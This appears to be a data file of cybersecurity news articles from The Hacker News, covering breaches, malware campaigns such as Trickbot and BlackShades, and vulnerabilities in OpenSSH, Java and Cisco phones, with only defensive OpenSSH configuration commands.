Update: Patches Coming Soon!
Western Digital has responded to our story, saying the company is aware of the vulnerabilities reported by researchers and it is in process of finalizing a scheduled firmware update to address the issue.
""We expect to post the update on our technical support site at https://support.wdc.com/ within a few weeks,"" the company said in a blog post.
""As a reminder, we also urge customers to ensure the firmware on their products is always up to date; enabling automatic updates is recommended.""
Trickbot Malware Returns with a new VNC Module to Spy on its Victims,https://thehackernews.com/2021/07/trickbot-malware-returns-with-new-vnc.html,"Cybersecurity researchers have opened the lid on the continued resurgence of the insidious Trickbot malware, making it clear that the Russia-based transnational cybercrime group is working behind the scenes to revamp its attack infrastructure in response to recent counter efforts from law enforcement.
""The new capabilities discovered are used to monitor and gather intelligence on victims, using a custom communication protocol to hide data transmissions between [command-and-control] servers and victims — making attacks difficult to spot,"" Bitdefender said in a technical write-up published Monday, suggesting an increase in sophistication of the group's tactics.
""Trickbot shows no sign of slowing down,"" the researchers noted.
Botnets are formed when hundreds or thousands of hacked devices are enlisted into a network run by criminal operators, which are often then used to launch denial-of-network attacks to pummel businesses and critical infrastructure with bogus traffic with the aim of knocking them offline. But with control of these devices, malicious actors can also use botnets to spread malware and spam, or to deploy file-encrypting ransomware on the infected computers.
Trickbot is no different. The notorious cybercrime gang behind the operation — dubbed Wizard Spider — has a track record of exploiting the infected machines to steal sensitive information, pivot laterally across a network, and even become a loader for other malware, such as ransomware, while constantly improving their infection chains by adding modules with new functionality to increase its effectiveness.
""TrickBot has evolved to use a complex infrastructure that compromises third-party servers and uses them to host malware,"" Lumen's Black Lotus Labs disclosed last October. ""It also infects consumer appliances such as DSL routers, and its criminal operators constantly rotate their IP addresses and infected hosts to make disruption of their crime as difficult as possible.""
The botnet has since survived two takedown attempts by Microsoft and the U.S. Cyber Command, with the operators developing firmware meddling components that could allow the hackers to plant a backdoor in the Unified Extensible Firmware Interface (UEFI), enabling it to evade antivirus detection, software updates, or even a total wipe and reinstallation of the computer's operating system.
Now according to Bitdefender, the threat actor has been found actively developing an updated version of a module called ""vncDll"" that it employs against select high-profile targets for monitoring and intelligence gathering. The new version has been named ""tvncDll.""
The new module is designed to communicate with one of the nine command-and-control (C2) servers defined in its configuration file, using it to retrieve a set of attack commands, download more malware payloads, and exfiltrate gathered from the machine back to the server. Additionally, the researchers said they identified a ""viewer tool,"" which the attackers use to interact with the victims through the C2 servers.
That's not all. A separate report published by Cofense this week discovered fresh evidence of the botnet targeting companies in the retail, building materials, manufacturing, insurance, and construction industries with phishing emails containing invoice-themed Word documents to trigger a ""fine-tuned workflow for stealing credentials.""
While efforts to squash the gang's operations may not have been entirely successful, Microsoft told The Daily Beast that it worked with internet service providers (ISPs) to go door-to-door replacing routers compromised with the Trickbot malware in Brazil and Latin America, and that it effectively pulled the plug on Trickbot infrastructure in Afghanistan.
T-Mobile Hacked — 2 Million Customers' Personal Data Stolen,https://thehackernews.com/2018/08/t-mobile-hack-breach.html,"T-Mobile today confirmed that the telecom giant suffered a security breach on its US servers on August 20 that may have resulted in the leak of ""some"" personal information of up to 2 million T-Mobile customers.
The leaked information includes customers' name, billing zip code, phone number, email address, account number, and account type (prepaid or postpaid).
However, the good news is that no financial information like credit card numbers, social security numbers, or passwords, were compromised in the security breach.
According to a brief blog post published by the company detailing the incident, its cybersecurity team detected and shut down an ""unauthorized capture of some information"" on Monday, August 20.
Although the company has not revealed how the hackers managed to hack into its servers neither it disclosed the exact number of customers affected by the data breach, a T-Mobile spokesperson told Motherboard that less than 3 percent of its 77 million customers were affected.
The spokesperson also said that unknown hackers part of ""an international group"" managed to access T-Mobile servers through an API that ""didn't contain any financial data or other very sensitive data,"" adding ""We found it quickly and shut it down very fast.""
T-Mobile said the company informed law enforcement about the security breach and is reaching out to its affected customers directly via SMS message, letter in the mail, or a phone call to notify them as well.
""We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,"" T-Mobile said. ""We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you.""
The U.S. telecom giant is also encouraging affected customers to contact its customer service through 611 for any information regarding the breach.
The T-Mobile incident marks the latest high-profile data breach and adds itself to the list of that other recent high profile attacks took place against Carphone Warehouse that affected its 10 million customers, and Ticketmaster that affected tens of thousands of its customers.
Did you receive any notification regarding this data breach? Let us know in the comments below.
Hundreds Of Operations Canceled After Malware Hacks Hospitals Systems,https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html,"Computer viruses do not discriminate.
They are not just hacking your email and online banking accounts anymore.
Computer viruses do not distinguish between a personal computer or a hospital machine delivering therapy to patients — and the results could prove deadly.
Cyber attacks on hospitals have emerged as a significant cyber security risk in 2016, which not only threaten highly sensitive information but also potentially harm the very lives of those being protected.
In the latest incident, hundreds of planned operations, outpatient appointments, and diagnostic procedures have been canceled at multiple hospitals in Lincolnshire, England, after a ""major"" computer virus compromised the National Health Service (NHS) network on Sunday.
In a bright-red alert warning labeled ""Major incident"" on its website, the Northern Lincolnshire and Goole NHS Foundation Trust (NLAG) said its systems in Scunthorpe and Grimsby were infected with a virus on October 30.
The incident forced the trust to shut down all the major systems within its shared IT network in order to ""isolate and destroy"" the virus and cancel surgeries.
""We have taken the decision, following expert advice, to shut down the majority of our systems so we can isolate and destroy it,"" the NHS wrote on its website. ""All planned operations, outpatient appointments and diagnostic procedures have been canceled for Wednesday, Nov. 2 with a small number of exceptions.""
Some patients, including major trauma patients and high-risk women in labor, were diverted to neighbouring hospitals.
Although the majority of systems are now back and working, the NHS Trust has not provided any specific information about the sort of virus or malware or if it managed to breach any defense.
The incident took place after the U.S. and Canada issued a joint cyber alert, warning hospitals and other organizations against a surge in extortion attacks that infect computers with Ransomware that encrypts data and demand money for it to be unlocked.
Although it is unclear at the moment, the virus could likely be a ransomware that has previously targeted hospitals and healthcare facilities.
Life Threatening Cyber-Attacks
With the rise in Ransomware threat, we have seen an enormous growth in the malware businesses.
The countless transactions of Bitcoins into the dark web have energized the Ransomware authors to distribute and adopt new infection methods for the higher successful rate.
Today, Ransomware have been a soft target for both Corporates as well as Hospitals.
Since earlier this year, over a dozen hospitals have been targeted by ransomware, enforcing them to pay the ransom amount as per the demand by freezing the central medical systems.
Technological advancement in the medical arena has digitalized patients data in the form of Electronic Medical Record (EMR) in order to save them into the hospital's central database.
Since the delay in patients treatment by temporary locking down their details could even result in the patient's death, the attackers seek 100 percent guarantee ransom by infecting hospitals with Ransomware.
Due to this reason, in most of the cases, hospitals generally agrees to pay the ransom amount to the attackers.
Earlier this year, the Los Angeles-based Presbyterian Medical Center paid $17,000 in Bitcoins to cyber crooks in order to restore access to its electronic medical systems, after a ransomware virus hit the hospital.
Also back in April, the MedStar Health chain that runs a number of hospitals in the Baltimore and Washington area, was attacked with Samsam ransomware (or Samas) that encrypted sensitive data at the hospitals.
Followingly, many more hospitals, including Methodist Hospital in Henderson and Kentucky, Desert Valley Hospital in California and Chino Valley Medical Center, have been infected with Ransomware.
Experts Sound Alarm On New Android Malware Sold On Hacking Forums,https://thehackernews.com/2021/01/experts-sound-alarm-on-new-android.html,"Cybersecurity researchers have exposed the operations of an Android malware vendor who teamed up with a second threat actor to market and sell a remote access Trojan (RAT) capable of device takeover and exfiltration of photos, locations, contacts, and messages from popular apps such as Facebook, Instagram, WhatsApp, Skype, Telegram, Kik, Line, and Google Messages.
The vendor, who goes by the name of ""Triangulum"" in a number of darknet forums, is alleged to be a 25-year-old man of Indian origin, with the individual opening up shop to sell the malware three years ago on June 10, 2017, according to an analysis published by Check Point Research today.
""The product was a mobile RAT, targeting Android devices and capable of exfiltration of sensitive data from a C&C server, destroying local data – even deleting the entire OS, at times,"" the researchers said.
An Active Underground Market for Mobile Malware
Piecing together Triangulum's trail of activities, the cybersecurity firm said the malware developer — aside from drumming up publicity for the RAT — also looked for potential investors and partners in September 2017 to show off the tool's features before offering the malware for sale.
Triangulum, subsequently, is believed to have gone off the grid for about a year-and-a-half, with no signs of activity on the darknet, only to resurface on April 6, 2019, with another product called ""Rogue,"" this time in collaboration with another adversary named ""HeXaGoN Dev,"" who specialized in the development of Android-based RATs.
Noting that Triangulum had previously purchased several malware products offered by HeXaGoN Dev, Check Point said Triangulum advertised his products on different darknet forums with well-designed infographics listing the full features of the RAT. Furthermore, HeXaGoN Dev posed as a potential buyer in a bid to attract more customers.
While the 2017 product was sold for a flat $60 as a lifetime subscription, the vendors pivoted to a more financially-viable model in 2020 by charging customers anywhere between $30 (1 month) to $190 (permanent access) for the Rogue malware.
Interestingly, Triangulum's attempts to expand to the Russian darknet market were met with failure following the actor's refusal to share demo videos on the forum post advertising the product.
From Cosmos to Dark Shades to Rogue
Rogue (v6.2) — which appears to be the latest iteration of a malware called Dark Shades (v6.0) that initially sold by HeXaGoN Dev before being purchased by Triangulum in August 2019 — also comes with features taken from a second malware family called Hawkshaw, whose source code became public in 2017.
""Triangulum didn't develop this creation from scratch, he took what was available from both worlds, open-source and the darknet, and united these components,"" the researchers said.
Dark Shades, as it turns out, is a ""superior successor"" to Cosmos, a separate RAT sold by the HeXaGoN Dev actor, thus making the sale of Cosmos redundant.
Rogue is marketed as a RAT ""made to execute commands with incredible features without a need of computer (sic),"" with additional capabilities to control the infected clients remotely using a control panel or a smartphone.
Indeed, the RAT boasts of a wide range of features to gain control over the host device and exfiltrate any kind of data (such as photos, location, contacts, and messages), modify the files on the device, and even download additional malicious payloads, while ensuring that the user grants intrusive permissions to carry out its nefarious activities.
It's also engineered to thwart detection by hiding the icon from the user's device, circumvent Android security restrictions by exploiting accessibility features to log user actions, and registers its own notification service to snoop on every notification that pops up on the infected phone.
What's more, stealth is built into the tool. Rogue uses Google's Firebase infrastructure as a command-and-control (C2) server to disguise its malicious intentions, abusing the platform's cloud messaging feature to receive commands from the server, and Realtime Database and Cloud Firestore to upload amassed data and documents from the victim device.
Rogue Suffered a Leak in April 2020
Triangulum may be currently active and expanding his clientele, but in April 2020, the malware ended up getting leaked.
ESET researcher Lukas Stefanko, in a tweet on April 20 last year, said the backend source code of the Rogue Android botnet was published in an underground forum, noting ""it has lot of security issues,"" and that ""it is new naming for Dark Shades V6.0 (same developer).""
But despite the leakage, Check Point researchers note that the Triangulum team still receives messages on the actor's home Darknet forum from interested customers.
""Mobile malware vendors are becoming far more resourceful on the dark net. Our research gives us a glimpse into the craziness of the dark net: how malware evolves, and how difficult it is to now track, classify and protect against them in an effective way,"" Check Point's Head of Cyber Research, Yaniv Balmas, said.
""The underground market is still like the wild-west in a sense, which makes it very hard to understand what is a real threat and what isn't.""
Critical OpenSSH Flaw Leaks Private Crypto Keys to Hackers,https://thehackernews.com/2016/01/openssh-vulnerability-cryptokeys.html,"A 'Serious' security vulnerability has been discovered and fixed in OpenSSH – one of the most widely used open-source implementations of the Secure Shell (SSH) Protocol.
The critical vulnerability could be exploited by hackers to force clients to leak their secret private cryptographic keys, potentially exposing users to Man-in-the-Middle (MITM) attacks.
What Causes the Flaw to occur?
The serious bug was actually the result of a code that enables an experimental ""roaming"" feature in the OpenSSH versions 5.4 to 7.1 in order to let users resume connections.
However, The roaming feature contains two different vulnerabilities:
An information sharing flaw (CVE-2016-0777)
A less harmless buffer overflow flaw (CVE-2016-0778)
The vulnerability does not have any catchy name like some previous OpenSSH flaws.
Impact of the Vulnerability
This new feature can be exploited by hackers, who could use a malicious OpenSSH server to trick an affected client to give up the SSH keys when they try to log in.
Cyber crooks with one compromised server can secretly grab SSH private keys required to log into other systems from a user's PC, allowing them to jump from server to server.
The vulnerability, which is said to be years old, was uncovered by researchers from Qualys' security team on 11 January and the issue was fixed within three days by the OpenSSH team with the release of a patch.
Here's what OpenSSH officials said in an advisory published Thursday:
""The matching server code has never been shipped, but the client code was enabled by default and could be tricked by a malicious server into leaking client memory to the server, including private client user keys.""
""The authentication of the server host key prevents exploitation by a man-in-the-middle, so this information leak is restricted to connections to malicious or compromised servers.""
Who is Affected by the Serious Flaw?
The flaw resides in the versions 5.4 to 7.1 of the OpenSSH client, which end users use to connect to servers and not resides in versions used by servers.
The issue affects users running OpenSSH client on most modern operating systems including Linux, FreeBSD and Mac OSX, as well as it may also affect users running OpenSSH for Windows. However, users running PuTTY on Windows are safe.
So, users don't have to update OpenSSH on the server side (Droplet), but should update the OpenSSH client on their local computer.
How to Fix the Flaw?
The OpenSSH team patched the security flaw in version 7.1p2 on Thursday. So, users and organisations are strictly advised to patch their OpenSSH implementations immediately, as well as regenerate their SSH private keys as a precaution.
The latest builds of FreeBSD and OpenBSD have also been patched, as have Debian, Ubuntu, and RedHat Enterprise Linux (RHEL).
Since security patches and updates are being released for the affected distributions, the client-side roaming feature causing this security bug can be disabled manually in order to resolve the issue.
On OS X, Linux and BSD variants, disabling roaming feature can be done by adding a line of code to your SSH configuration.
On FreeBSD and Linux
Run the given command to add the new line to your configuration:
echo 'UseRoaming no' | sudo tee -a /etc/ssh/ssh_config
On Mac OSX
Run the given command to add the new line to your configuration:
echo ""UseRoaming no"" >> ~/.ssh/config
Once this is done, you need to close any open SSH session in order for the change to be effective.
Proof-of-Concept Exploit
OpenSSH said they are not aware of attacks in wild exploiting this flaw, but Qualys said this issue may have already been exploited in the wild by sophisticated attackers.
Later on Thursday, Qualys published a post, including a proof-of-concept exploit code, effectively lighting a fire under every affected OpenSSH client.
The vulnerability is thought to be one of the most severe vulnerabilities discovered in the open-source software in years, and it's difficult to say how big the impact will be.
Patch Now! Patch Fast! Be Safe!
"New ""Fileless Malware"" Targets Banks and Organizations Spotted in the Wild",https://thehackernews.com/2017/02/fileless-malware-bank.html,"More than a hundred banks and financial institutions across the world have been infected with a dangerous sophisticated, memory-based malware that's almost undetectable, researchers warned.
Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US, South America, Europe and Africa, with Fileless malware that resides solely in the memory of the compromised computers.
Fileless malware was first discovered by the same security firm in 2014, has never been mainstream until now.
Fileless malware is a piece of nasty software that does not copy any files or folder to the hard drive in order to get executed. Instead, payloads are directly injected into the memory of running processes, and the malware executes in the system's RAM.
Since the malware runs in the memory, the memory acquisition becomes useless once the system gets rebooted, making it difficult for digital forensic experts to find the traces of the malware.
The attack was initially discovered by a bank's security team after they found a copy of Meterpreter — an in-memory component of Metasploit — inside the physical memory of a Microsoft domain controller.
After conducting a forensic analysis, Kaspersky researchers found that the attackers leveraged Windows PowerShell to load the Meterpreter code directly into memory rather than writing it to the disk.
The cyber crooks also used Microsoft's NETSH networking tool to set up a proxy tunnel for communicating with the command and control (C&C) server and remotely controlling the infected host.
They also stashed the PowerShell commands into the Windows registry in an effort to reduce nearly all traces of the attacks left in logs or hard drive after a reboot of the device, making detection and forensic analysis difficult.
The ultimate goal of the attackers was apparently aimed at compromising computers that control ATMs so that they could steal money.
Kaspersky Lab researchers plan to reveal more details in April about the attack, which is occurring on an industrial scale worldwide.
The attack has already hit more than 140 enterprise networks in business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK, and Russia. And since the threat is so hard to spot, the actual number is likely much higher.
Google Chrome Inbuilt Flash player allows Webcam Hacking,https://thehackernews.com/2013/06/Webcam-Hacking-Flash-clickjacking.html,"No longer limited to Hollywood movies about cybercrime, webcam hacking has stealthily and aggressively broken into average households
""I've heard a hacker could access my webcam and watch me in front of my computer. Could this really happen?"" YES, other than using a Remote administration tools, it is also technically possible using new Flash based flaw in Google Chrome.
According to a recent report by security researchers, there's a big problem in Google Chrome's integrated Flash player. The proof-of-concept posted by Egor Homakov. When the play button is pressed, the user is actually allowing for his/her webcam to grab video and audio from a compromised computer without getting the user's permission.
""This works precisely like regular clickjacking - you click on a transparent flash object, it allows access to Camera/Audio channel. Voila, attacker sees and hears you,"" Homakov warned.
These kinds of virtual hacks have been taking place for years. An invisible Flash element is present on the page, the victim (using Chrome) clicks on it, and that's it.
Adobe security team spokeswoman confirmed there was an issue but said it was limited to Flash Player for Google Chrome.
Google recently imposed a seven day deadline for vendors to respond to security bug reports. Homakov's discovery represents the first chance to see whether Google itself can stick to such tight deadlines.
The rapid growth of laptop computers with built-in web cameras substantially increases the risk of webcam hacking, privacy invasion, and other types of cybercrime (e.g., bullying, hate crimes, stalking, etc.).
Password Stealing Apps With Over A Million Downloads Found On Google Play Store,https://thehackernews.com/2017/12/google-playstore-malware.html,"Even after so many efforts by Google like launching bug bounty program and preventing apps from using Android accessibility services, malicious applications somehow manage to get into Play Store and infect people with malicious software.
The same happened once again when security researchers discovered at least 85 applications in Google Play Store that were designed to steal credentials from users of Russian-based social network VK.com and were successfully downloaded millions of times.
The most popular of all masqueraded as a gaming app with more than a million downloads. When this app was initially submitted in March 2017, it was just a gaming app without any malicious code, according to a blog post published Tuesday by Kaspersky Lab.
However, after waiting for more than seven months, the malicious actors behind the app updated it with information-stealing capabilities in October 2017.
Besides this gaming app, the Kaspersky researchers found 84 such apps on Google Play Store—most of them were uploaded to the Play Store in October 2017 and stealing credentials for VK.com users.
Other popular apps that were highly popular among users include seven apps with between 10,000 and 100,000 installations, nine with between 1,000 and 10,000 installations, and rest of all had fewer than 1,000 installations.
Here's How Cyber Criminals Steal Your Account Credentials:
The apps used an official SDK for VK.com but slightly modified it with malicious JavaScript code in an effort to steal users' credentials from the standard login page of VK and pass them back to the apps.
Since these apps looked like they came from VK.com – for listening to music or for monitoring user page visits, requiring a user to login into his/her account through a standard login page did not look suspicious at all.
The stolen credentials were then encrypted and uploaded to a remote server controlled by the attackers.
""The interesting thing is that although most of these malicious apps had a described functionality, a few of them were slightly different—they also used malicious JS code from the OnPageFinished method, but not only for extracting credentials but for uploading them too,"" Kaspersky said.
Researchers believe that the cybercriminals use stolen credentials mostly for promoting groups in VK.com, by silently adding users to promote various groups and increase their popularity by doing so, since they received complaints from some infected users that their accounts had been silently added to unknown groups.
The cybercriminals behind these apps had been publishing their malicious apps on the Play Store for more than two years, so all they had to do is modify their apps to evade detection.
Since VK.com is popular mostly among users in CIS countries, the malicious apps were targeting Russian, Ukrainian, Kazakh, Armenian, Azerbaijani, Romanian, Belarusian, Kyrgyz, Tajik, and Uzbek users.
The apps did so by first checking the device language and asked for login credentials from users with one of the above-mentioned languages.
In addition, researchers also noted that they found several other apps on Google Play Store that were submitted by the same cyber criminals and published as unofficial clients for the popular messaging app Telegram.
""These apps were not only masquerading as Telegram apps, they were actually built using an open source Telegram SDK and work almost like every other such app,"" the researchers said, adding that these apps also add infected users to promoted groups/chats based on a list received from their server.
How to Protect Your Device From Such Malicious Apps
All the apps, including the credential-stealing apps (detected as Trojan-PSW.AndroidOS.MyVk.o) and malicious Telegram clients (detected as not-a-virus:HEUR:RiskTool.AndroidOS.Hcatam.a), have since been removed by Google from the Play Store.
However, those who have already installed one of the above apps on their mobile devices should make sure their devices have Google Play Protect enabled.
Play Protect is Google's newly launched security feature that uses machine learning and app usage analysis to remove (uninstall) malicious apps from users Android smartphones to prevent further harm.
Although it is a never-ending concern, the best way to protect yourself is always to be vigilant when downloading apps from Google's official Play Store, and always verify app permissions and reviews before you download one.
Moreover, you are strongly advised to always keep a good antivirus app on your mobile device that can detect and block such malicious apps before they can infect your device, and always keep your device and apps up-to-date.
Java Zero-day vulnerability exploited in the Wild,https://thehackernews.com/2015/07/java-zero-day-vulnerability.html,"Really a bad weekend for Internet users. Three previously unknown critical zero-day vulnerabilities were revealed in Adobe's Flash Player over the weekend, thanks to Hacking team data Breach in which 400GB of internal data were leaked over the Internet.
Now, a new zero-day vulnerability has been reported in Oracle's Java that is reportedly being exploited in the wild by hackers to target government armed forces.
Cybercriminals are actively exploiting the Java-based zero-day flaw in an attempt to target U.S. defense agencies and members of NATO, Trend Micro security researchers warned in a blog post published Sunday.
According to researchers, the vulnerability affects only the latest version of Java, version Though the older Java versions, Java 1.6 and 1.7 are not at all affected by this zero-day exploit.
So far, there isn't many details disclosed about the Java zero-day bug, considering a patch is yet to be released by Oracle. Although hackers are exploiting the zero-day flaw through drive-by-downloads attack.
Java Zero-Day Exploit in the Wild
Cyber criminals are using email messages to spread the malicious links hosting the Java zero-day exploit. Once clicked, the exploit code delivers a basic Trojan dropper, TROJ_DROPPR.CXC, that drops a payload called TSPY_FAKEMS.C into the ""/login user"" folder.
From login user folder, the malware executes an arbitrary code on the default Java settings thus compromising the security of the system.
Researchers have also unearthed an attack that leverages a three-year-old Windows vulnerability identified as CVE-2012-015, which Microsoft addressed in Bulletin MS12-027 three years ago.
Operation Pawn Storm APT Group Behind Java 0_day Exploit
The advanced persistent threat (APT) group Operation Pawn Storm are thought to be responsible for the Java zero-day exploit attacking the member of NATO and the US defense organization, but the security firm did not disclose the names where the attack was sighted.
Pawn Storm, a group of hackers specialized in cyber-espionage operation, has been active since 2007 and has also been known by different names, including APT28, Sednit, Fancy Bear, and Tsar Team.
Are You Vulnerable to New Java Zero-Day Exploit?
Oracle developers are working with Trend Micro to develop a fix to patch the issue. Until the patch is rolled out, users are advised to disable Java temporarily in their browser.
Creator of Blackshades Malware Jailed 4 Years in New York,https://thehackernews.com/2015/06/blackshades-malware-creator.html,"A Swedish man who was the mastermind behind the $40 BlackShades Remote Access Tool (RAT) that infected over half a million systems around the world was sentenced to almost five years in a U.S. prison on Tuesday.
Alex Yücel, 25, owned and operated an organization called ""BlackShades"" that sold a sophisticated and notorious form of software, called RAT, to several thousands of hackers and other people in more than 100 countries for prices ranging from $40 to $50.
BlackShades malware was designed to capture keystrokes, steal usernames and passwords for victims' email and Web services, FTP clients, instant messaging applications, and lots more.
In the worst case, the malicious software even allowed hackers to take remote control of victim's computer and webcam to pilfer photos or videos without the knowledge of the computer owner.
Yucel (a.k.a. ""marjinz"") was sentenced to four and three-quarter years in prison by U.S. District Judge Kevin Castel after pleading guilty in February in a New York federal court, according to the U.S. Department of Justice.
The accused asked the judge for leniency in imposing sentence and said he regret marketing the sophisticated malware to hackers. ""I deeply regret starting this [BlackShades] whole project, which obviously went out of control,"" he said.
However, Castel sentenced him to 57 months behind bars along with a penalty of $200,000, saying that ""the message must go forth that this is a serious crime.""
""We rely on our computers as an extension of how we live our lives,"" Castel said in a press release. ""This is spreading misery to the lives of thousands [of online people]. That's what this is.""
Yucel has already served approximately 13 months in New York prison and roughly one month in Moldova custody, where he was held after capture.
The accused developed the RAT with Michael Hogue, an Arizona US resident who already pleaded guilty for the creation of BlackShades malware and agreed to cooperate with U.S. authorities as part of a plea deal. Hogue is scheduled to be sentenced on July 24 this year.
In mid-May last year, the law enforcement authorities in the United States and Europe started large-scale International raids against people suspected of developing, selling and buying the notorious BlackShades RAT.
The raids took place in over 100 countries worldwide, and the authorities seized 1,900 command and control (CnC) domains and arrested more than 100 people around the world involved in the illegal activities related to BlackShades malware.
BlackShades tool was actually developed by an IT surveillance and security-based company, as a tool for parents to monitor their children's activities and for finding the cheating partners in the relationship. However, as usual the cyber criminals have made it a favorite tool to carry out illicit activities.
Cisco VoIP phone vulnerability allow eavesdropping remotely,https://thehackernews.com/2012/12/cisco-voip-phone-vulnerability-allow.html,"Cui, a fifth year grad student from the Columbia University Intrusion Detection Systems Lab and co-founder of Red Balloon Security, has demonstrated an attack on common Cisco-branded Voice over IP (VoIP) phones that could easily eavesdrop on private conversations remotely.
The vulnerability Cui demonstrated was based on work he did over the last year on what he called 'Project Gunman v2', where a laser printer firmware update could be compromised to include additional, and potentially malicious, code.
The latest vulnerability is based on a lack of input validation at the syscall interface. Cui said, ""allows arbitrary modification of kernel memory from userland, as well as arbitrary code execution within the kernel. This, in turn, allows the attacker to become root, gain control over the DSP , buttons, and LEDs on the phone.""
While he did not specify the precise vulnerability, Cui said it allowed him to patch the phone's software with arbitrary pieces of code, and that this allowed him to turn the Off-Hook Switch into what he called a funtenna.
According to Cui, once one phone is compromised, the entire network of phones is vulnerable. Cui later said he could also perform a similar exploit remotely, without the need to insert a circuit board at all.
He also said that routers, printers and phones are general-purpose computers without host-based intrusion systems or antivirus protection built in, so they make attractive targets. Further, they often lack encryption for data in motion or at rest.
Cui said affected models include Cisco Unified IP Phone 7975G, 7971G-GE, 7970G, 7965G, 7962G, 7961G, 7961G-GE, 7945G, 7942G, 7941G, 7941G-GE, 7931G, 7911G, and 7906. Models 7971G-GE, 7970G, 7961G, 7961G-GE, 7941G, 7941G-GE, and 7906 are also vulnerable.
In response to his findings, Cisco says that workarounds and a software patch are available to address the issue, and that successful exploitation requires physical access to the device serial port or a combination of remote authentication privileges and non default settings.
Ransomware Attack Caused Power Outages in the Biggest South African City,https://thehackernews.com/2019/07/cyberattack-power-outage.html,"Yesterday, some residents of Johannesburg, the largest city in South Africa, were left without electricity after the city's power company got attacked by a ransomware virus.
City Power, the company responsible for powering South Africa's financial capital Johannesburg, confirmed Thursday on Twitter that it had been hit by a Ransomware virus that had encrypted all of its databases, applications, and network.
The attack prevented prepaid customers from buying electricity units, upload invoices when making payments, or access the City Power's official website, eventually leaving them without power.
""Please note that the virus hit us early Thursday morning, compromising our database and other software, impacting most of our applications and networks,"" the city government said in a tweet.
However, the company has also ensured its customers that none of their details were compromised in the cyber attack.
At the time of writing, the company confirmed they have restored electricity supply in many areas and also most of the critical applications, including the prepaid vending system responsible for enabling its customers to buy electricity.
However, customers seeking to access the City Power website to log faults are still not able to do so. They are requested to log calls by their mobile phones using citypower.mobi.
Depending on the type and severity of the cyberattack, it is believed that the complete clean up of the affected services and networks could take weeks.
Also, it could cost millions of dollars—just like the City of Baltimore recently spent $5,310,546 in hiring security consultant firms and upgrading its infrastructure following a ransomware attack that shut down the majority of its servers.
The city government did not provide any details on the type of ransomware virus that hit the power company, or if the company has a backup for critical files encrypted by the malware.
""Customers should not panic as none of their details were compromised,"" the city government said Thursday afternoon. ""We apologize for the inconvenience caused to the people of the City of Joburg. Please be patient with us, and we expect to have everything back in order by the end of Thursday.""
Johannesburg is not the only one that was recently hit by a ransomware attack. A growing number of cities has targeted in the last few months with ransomware as cybercriminals aim municipalities around the world.
Last month, ransomware viruses hit two cities in Florida that made large ransom payments to gain back access to city files that were encrypted in the attacks—these cities include Riviera Beach City ($600,000) and Lake City ($500,000) in Florida.
However, federal authorities and cybersecurity experts have always advised victims not to pay ransoms since it encourages criminals, and also there's no guarantee of files or computer systems being completely restored.
Instead of paying the ransom, organizations and companies should consider having robust backups of their important and required files and data in place as well as educating their employees to avoid being a victim of such cyber attacks.
Rapid7 Source Code Breached in Codecov Supply-Chain Attack,https://thehackernews.com/2021/05/rapid7-source-code-breached-in-codecov.html,"Cybersecurity company Rapid7 on Thursday revealed that unidentified actors improperly managed to get hold of a small portion of its source code repositories in the aftermath of the software supply chain compromise targeting Codecov earlier this year.
""A small subset of our source code repositories for internal tooling for our [Managed Detection and Response] service was accessed by an unauthorized party outside of Rapid7,"" the Boston-based firm said in a disclosure. ""These repositories contained some internal credentials, which have all been rotated, and alert-related data for a subset of our MDR customers.""
On April 15, software auditing startup Codecov alerted customers that its Bash Uploader utility had been infected with a backdoor as early as January 31 by unknown parties to gain access to authentication tokens for various internal software accounts used by developers. The incident didn't come to light until April 1.
""The actor gained access because of an error in Codecov's Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script,"" the company noted, adding the adversary carried out ""periodic, unauthorized alterations"" to the code that enabled them to exfiltrate information stored in its users' continuous integration (CI) environments to a third-party server.
Rapid7 reiterated there's no evidence that other corporate systems or production environments were accessed, or that any malicious changes were made to those repositories. The company also added its use of the Uploader script was limited to a single CI server that was used to test and build some internal tools for its MDR service.
As part of its incident response investigation, the security firm said it notified a select number of customers who may have been impacted by the breach. With this development, Rapid7 joins the likes of HashiCorp, Confluent, and Twilio who have publicly confirmed the security event to date.
Codecov customers who have used the Bash Uploaders between January 31, 2021 and April 1, 2021 are recommended to re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes.
FBI's Cyber Task Force Identifies Stealthy FF-RATs used in Cyber Attack,https://thehackernews.com/2015/09/stealthy-malware-cyber-attack.html,"In both April and June this year, a series of cyber attacks was conducted against the United States Office of Personnel Management (OPM).
These attacks resulted in 21 million current and former Federal government employees' information being stolen.
After months of investigation, the FBI's Cyber Task Force identified several Remote Access Tools (RATs) that were used to carry out the attack. One of the more effective tools discovered is named 'FF-RAT'.
FF-RAT evades endpoint detection through stealth tactics, including the ability to download DLLs remotely and execute them in memory only.
Hackers use RATs to gain unlimited access to infected endpoints. Once the victim's access privilege is acquired, it is then used for malware deployment, command and control (C&C) server communication, and data exfiltration.
Most Advanced Persistent Threat (APT) attacks also take advantage of RAT functionality for bypassing strong authentication, reconnaissance, spreading infection, and accessing sensitive applications to exfiltrate data. In order to mitigate these types of attacks, it is key that you have tools and methods in place for early detection.
It's important these attacks are identified in time for you to isolate infected assets and remediate issues before they spread or move to a second stage (deploying additional malware, stealing important data, acting as its own C&C server, etc.)
How this affects you
When deploying a RAT, a hacker's primary goal is to create a backdoor to infected systems so they can gain complete control over that system.
When a RAT is installed on your system, the attacker is then able to view, change, or manipulate data on the infected machine. This leaves you open to your, and possibly your clients', sensitive data being stolen.
Often, a single RAT is deployed as a pivot point to deploy additional malware in the local network or use the infected system to host malware for remote retrieval.
How AlienVault Helps
AlienVault Labs, AlienVault's team of security researchers, continue to perform cutting edge research on these types of threats.
They collect large amounts of data and then create expert threat intelligence correlation directives, IDS signatures, vulnerability audits, asset discovery signatures, IP reputation data, data source plugins, and report templates.
Activity from FF-RAT can be detected through IDS signatures and a correlation rule that the Labs team has released to the AlienVault Unified Security Management (USM) platform.
Learn more about AlienVault USM:
Download a free 30-day trial
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Play with USM in our product sandbox (no download required)
"Air Canada Suffers Data Breach — 20,000 Mobile App Users Affected",https://thehackernews.com/2018/08/air-canada-data-breach.html,"Air Canada has confirmed a data breach that may have affected about 20,000 customers of its 1.7 million mobile app users.
The company said it had ""detected unusual log-in behavior"" on its mobile app between August 22 and 24, during which the personal information for some of its customers ""may potentially have been improperly accessed.""
